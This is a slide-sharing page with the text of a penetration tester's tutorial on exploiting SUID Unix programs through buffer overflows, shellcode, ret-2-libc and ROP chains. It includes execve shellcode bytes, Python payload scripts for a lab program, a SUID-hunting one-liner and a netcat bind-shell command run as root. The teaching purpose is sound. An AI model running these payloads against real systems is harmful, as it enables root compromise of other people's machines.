UploadLanguage (EN)Support
BusinessMobileSocial MediaMarketingTechnologyArt & PhotosCareerDesignEducationPresentations & Public SpeakingGovernment & NonprofitHealthcareInternetLawLeadership & ManagementAutomotiveEngineeringSoftwareRecruiting & HRRetailSalesServicesScienceSmall Business & EntrepreneurshipFoodEnvironmentEconomy & FinanceData & AnalyticsInvestor RelationsSportsSpiritualNews & PoliticsTravelSelf ImprovementReal EstateEntertainment & HumorHealth & MedicineDevices & HardwareLifestyle
Upload
Sign in
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP, profile picture
Uploaded byAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
PDF, PPTX4,608 views

Unix executable buffer overflow

This document discusses various techniques for exploiting UNIX executable programs, including buffer overflow vulnerabilities. It begins with an introduction and outlines an agenda covering vulnerable UNIX applications, memory layout and stacks, buffer overflows, shellcode, and various protection mechanisms and bypass techniques. These include basic stack overflows, bypassing password protections, limited stack spaces, Ret-2-libc exploits, and return-oriented programming (ROP) chains to execute multiple commands. Demo exploits are proposed to show gaining root privilege on vulnerable applications.

Technology
Download as PDF, PPTX
1 / 148
2 / 148
3 / 148
4 / 148
5 / 148
6 / 148
7 / 148
8 / 148
9 / 148
10 / 148
11 / 148
12 / 148
13 / 148
14 / 148
15 / 148
16 / 148
17 / 148
18 / 148
19 / 148
20 / 148
UNIX EXECUTABLE EXPLOITATION Ammarit Thongthua <ShellCodeNoobx Es>
#whoami <Name> Ammarit Thongthua Mr. K ShellCodeNoob </Name> <Profile> PentestTeam leader in private company </Profile> FB : Ammarit Es Shellcodenoob
“There are some relationships between - Reverse Engineering - Buffer overflow - Shellcode They are the complement of each other” “Sleepy Kama” #Inspiration
Today, we will start with
AGENDA  Introduction  Vulnerable Unix executable  Memory Space and Stack Layout  Buffer Overflow  Unix application Basic Reverse Engineer  ShellCode  Protection vs Expliotation  Basic Stack without protection  Bypass password protection  Exploitto get root privilege  Limited Stack Space  StackGuard (Canary)  Non-Executable-Stack (NX)  ROP Chain  Address Space Layout Randomization (ASLR)  Defeat with static system library (kernel < 2.6.20 )  ASLR with removed Static system library  Defeat with application wrapping (kernel >= 2.6.20 )  Compare with windows exploitation
Chapter I “Vulnerable Unix Application”
VULNERABLE UNIX APPLICATION  Has permission “root” as user or group  SUID or SGID is set (Sting S at eXecute bit)  This 2 criteria provided privilege escalation to be root  list="$(find / -perm -4000 -o -perm -2000)";for i in $list; do ls -al $i; done  ls –R / | grep “wsr” | grep “root”
VULNERABLE UNIX APPLICATION
VULNERABLE UNIX APPLICATION  Use vulnerable input standard function  Ex: strcp(), gets(), sprintf (), vsprintf ()  They make the program can possibly segmentation fault or buffer overflow
Chapter II “Memory Address and Stack Layout”
MEMORY ADDRESS AND STACK LAYOUT 0xFFFFFFFF 0x00000000 Code Segment Data Segment DSS Segment Heap Stack
MEMORY ADDRESS AND STACK LAYOUT 0xFFFFFFFF 0x00000000 Code Segment Data Segment DSS Segment Heap Stack
MEMORY ADDRESS AND STACK LAYOUT 0xFFFFFFFF 0x00000000 Code Segment Data Segment DSS Segment Heap Stack
MEMORY ADDRESS AND STACK LAYOUT main () { int i = 0; checkpw (); } char pw[608];
MEMORY ADDRESS AND STACK LAYOUT 0xFFFFFFFF 0x00000000 Stack Int i = 0; ….. Previous Stacks Main() ESP
MEMORY ADDRESS AND STACK LAYOUT main () { int I = 0; checkpw (); } char pw[608];
MEMORY ADDRESS AND STACK LAYOUT main () { int I = 0; checkpw (); } char pw[608]; RP
MEMORY ADDRESS AND STACK LAYOUT 0xFFFFFFFF 0x00000000 Char pw[608]; Int i = 0; ….. Previous Stacks Main() checkpw() SFP RP Stack ESP
Chapter III “Stack buffer overflow”
BUFFER OVERFLOW  The situation when the data that input to the system is larger than the size of buffer that declare to be used AAAAAAAAAA....[607 of A]….AAAx00 SFP RP AAAAAAAAAA….[616 of A]….AAAAAAAAAAAAAAx00 SFP = 0x41414141 ***RP = 0x41414141 “Segmentation fault” “Illegal Instruction” SFP RP Ex: char pw[608];
“How can we detect buffer overflow in unix application?”
“Generally, we use manually test”
BUFFER OVERFLOW
“Better way, we use pattern test”
BUFFER OVERFLOW /usr/share/metasploit-framework/tools/pattern_create.rb 1000  Check buffer overflow position
BUFFER OVERFLOW
 Check buffer overflow position /usr/share/metasploit-framework/tools/pattern_offset.rb 41347541 BUFFER OVERFLOW
“What happen if we can over write Return Pointer?” “Can we control flow of instruction?”
“Yes”
BUFFER OVERFLOW AAAAAAAAAAAAA….[612 of A]….AAAAAAA SFP = 0x41414141 ***RP = 0x080484c7 “Segmentation fault” “Illegal Instruction” SFP RP 0x080484c7
BUFFER OVERFLOW
BUFFER OVERFLOW Demo #1 GDB and Bypass password protection
Chapter IV “Basic Shellcode”
“Imagine if we can control Return Pointer to our own Instruction” “So, we can control the whole system”
SHELL CODE [Malicious Machine OpCode] + AAAAAAAAAAAAAAA SFP = 0x41414141 ***RP = 0xFBFF0544 0xFBFF0544 0xFBFF0544 SFP RP  Attacker can control return pointer to run Malicious Machine OpCode that put to memory (Shell Code).  Insert shell code as a part of input to reduce the complexity of exploitation
SHELL CODE  Shell code is the code that attacker want the system run in order to operate the command as attacker need (create form assembly and convert to OpCode  Ex;  Open port for connection to that system with root privilege  Add user to the system  Run shell as root privilege  Shell code is written as Hexadecimal format
“What happen if we can make Return Pointer system_call /bin/sh by programrun as root ?”
“We will get shell prompt with root pri.”
SHELL CODE 31 C0 50 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 50 53 89 E1 B0 0B CD 80 Assembly Code Op Code Shell Code : system_call (/bin/sh) /bin 0000 //sh 0000 $esp
SHELL CODE System_call(/bin/sh)Run as “root” Vulnerability program We get /bin/sh as root  RP
“How can we get shellcode ?”
 Where can we get shell code use to make exploit. ?  Create your own shell code (quite take time)  Use Metasploit to generate shell code  Metepreter  Search from internet  shell-storm.org/shellcode  packetstormsecurity.com  www.exploit-db.com/exploits SHELL CODE
“How can we manually create shellcode ?”
“Good news, you need to understand Assemble first !!”
https://defuse.ca/online-x86-assembler.htm#disassembly SHELL CODE
SHELL CODE
“How can we know what is shellcode do ?”
“Good news again, you need to understand Assemble first !!”
http://www2.onlinedisassembler.com/odaweb/ SHELL CODE
“Can you see something difference between Assembly from debugger and output from the webs?”
ASSEMBLY CODE From our debugger From our web disassembly
What’s wrong ?
Nothing wrong.. It’s just different instruction set
ASSEMBLY CODE From our debugger From our web disassembly AT&T base instruction Intel base instruction
Chapter V “Make exploit payload”
EXPLOIT PAYLOAD [Shell Code] + [PADDING make size to 612 ] SFP = 0x41414141 ***RP = 0xBFFF528 0xBFFF528 SFP RP Payload = Shellcode + PAD + RP 612 bytes 4 bytes 0xBFFF528 Example:
 Where is the shell code start location (For this example case)?  Need to reverse engineering and debug EXPLOIT PAYLOAD
Shellcode = “x31xc0x50x68x2fx2fx73x68x68x2fx62x69" "x6ex89xe3x50x53x89xe1xb0x0bxcdx80” RP = “x20xf5xffxbf” #0xBFFF520 (Little Endean!!!) PAYLOAD = scode + “A”*528 + RP print PAYLOAD ----------------------------------------------------------------------------------------------- user@host:$ python exp.py | ./vul_app EXPLOIT PAYLOAD
“Let’s try our payload”
EXPLOIT PAYLOAD  Sometime result of our exploit is crash !!!
“What’s wrong in our PAYLOAD ^^? ”
EXPLOIT PAYLOAD  Memory on address when debug and run exploit payload may a bit shift [Shell Code] + [PADDING make size to 612 ] 0xBFFF528
“How can we solve this problem ?”
[ Shell Code ] + [ 577 Byte of PADDING ] 0xBFFF528 EXPLOIT PAYLOAD [400B. Landing space]+[Shell Code]+ [177 B. PADDING ]0xBFFF540 NOP (x90) = Do nothing
Shellcode = “x31xc0x50x68x2fx2fx73x68x68x2fx62x69" "x6ex89xe3x50x53x89xe1xb0x0bxcdx80” RP = “x58xf5xffxbf” # 0xBFFF558 Exp = “x90”*400 + scode + “A”*128 + RP ----------------------------------------------------------------------------------------------- user@host:$ python exp.py | ./vul_app EXPLOIT PAYLOAD
“Let’s try our improved payload”
EXPLOIT CODE  When exploit successfully
EXPLOIT CODE Demo #2 Exploit to get root privilege
Chapter VI “Buffer overflow in limited stack space”
LIMITED STACK SPACE x31x57xdfx45x98xcex55xedx78xedxedx57x76x23x12x6fxf3x6ex4a SFP = 0x12237657 ***RP = 0x4a6ef36f SFP RP Payload =x31x57xdfx45x98xcex55xedx78xedxedx57x76x23x12x6fxf3x6ex4a “Segmentation fault” “Illegal Instruction”
“How can we solve this problem”
LIMITED STACK SPACE [ NOP Space (NOP Sledding)] + [S h e l l C o d e ] AAAAAAAAAAAAA…[612 of A]…AAAAAAAA SFP = 0x41414141 ***RP = 0xBFFFxxxx ??? (We don’t know yet) 0xFBFFxxxx 0xFBFFxxxx SFP RP  If size of buffer is limited, we need to put some shell code some where in stack and control RP to run shell code
LIMITED STACK SPACE ***RP = 0xBFFFF7B0
Shellcode = “x31xc0x50x68x2fx2fx73x68x68x2fx62x69" "x6ex89xe3x50x53x89xe1xb0x0bxcdx80” RP = “xb0xf7xffxbf” # 0xBFFF520 Exp =`python c- ‘print “A”*612` + RP + =`python c- ‘print “x90”*400` + scode ----------------------------------------------------------------------------------------------- user@host:$ python exp.py | ./vul_app LIMITED STACK SPACE
 When exploit successfully LIMITED STACK SPACE
Demo #3 Exploit to get root privilege With Limited Stack Space LIMITED STACK SPACE
SUMMARY Grant()main()AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP x90x90x90 x90x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP x90 x90x90x90x90x90x90 + [Shell Code]AAAAAAAAAAAAAAAAAAAAAAAAAAA RP AAAAA  Bypass password protection  Buffer overflow to run shellcode to get root privilege  Buffer overflow to run shellcode with limited Stack Space
“Is it easy like this in real life?”
“No..”
Chapter VII “Ret-2-libc”
“What is Ret-2-libc ?”
 Characteristic of vulnerable program  Has set SUID, GUID  Can Overflow  Use Libc. BYPASS LIMITED STACK SPACE BY RET-2-LIBC
“What happen if we jump RP and run?” system_call nc –l –p 9999 –e /bin/sh
 Fool program to make system call with evil command  System_call nc -l -p 9999 -e /bin/sh AAAAAAAAAAAAA If Arg = “nc -l -p 9999 -e /bin/sh” and Program run as “root” So, “nc –l –p 9999 –e /bin/sh” run as “root” SFP RP Argsystem BYPASS LIMITED STACK SPACE BY RET-2-LIBC
 Find location of “system” call function BYPASS LIMITED STACK SPACE BY RET-2-LIBC
 Create “evil” Argument as system global variable AAAAAAAAAAAAA SFP RP = Argsystem xf0x4execxb7 x98xfaxffxbfNC = BYPASS LIMITED STACK SPACE BY RET-2-LIBC
 Result BYPASS LIMITED STACK SPACE BY RET-2-LIBC
 When exploit successfully BYPASS LIMITED STACK SPACE BY RET-2-LIBC
Demo #4 Exploit to get root privilege with Ret-2-libc style BYPASS LIMITED STACK SPACE BY RET-2-LIBC
Chapter VIII “ROP Chaining”
 The limitation of Ret-2-Libc is run only 1 command a time to exploit AAAAAAAAAAAAA SFP RP = Argsystem xf0x4execxb7 x98xfaxffxbfNC = ROP CHAIN
“It’s better if we can run more than one commandin one exploit”
“Let improve Ret-2-Libc to ROP Chaining”
AAAAAAAAAAAAA SFP RP = Arg1system xf0x4execxb7 x98xfaxffxbfNC = ROP CHAIN RP
AAAAAAAAAAAAA Arg1system ROP CHAIN RP
Arg1system ROP CHAIN RP
Arg1system ROP CHAIN RP
Arg1system ROP CHAIN RP Arg2system
ROP CHAIN Arg1system system Arg2RP